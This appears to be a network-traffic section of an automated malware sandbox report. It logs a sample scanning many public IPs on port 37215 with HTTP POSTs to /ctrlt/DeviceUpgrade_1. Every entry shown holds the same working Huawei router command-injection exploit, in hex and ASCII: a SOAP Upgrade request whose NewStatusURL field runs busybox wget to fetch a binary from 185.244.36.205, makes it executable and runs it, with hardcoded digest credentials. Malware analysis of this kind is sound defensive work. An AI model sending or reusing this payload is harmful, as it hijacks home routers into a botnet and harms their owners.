                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1248192.168.2.1552680156.22.61.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396951914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1249192.168.2.155983241.96.246.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396979094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1250192.168.2.154597885.197.185.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396985054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1251192.168.2.1558854121.181.117.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397006989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1252192.168.2.1557548186.58.174.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397026062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1253192.168.2.155845894.33.163.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397042036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1254192.168.2.154977041.55.14.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397102118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1255192.168.2.1560086186.77.187.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397119999 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1256192.168.2.1544348197.112.189.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397181034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1257192.168.2.1537382181.241.130.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397196054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
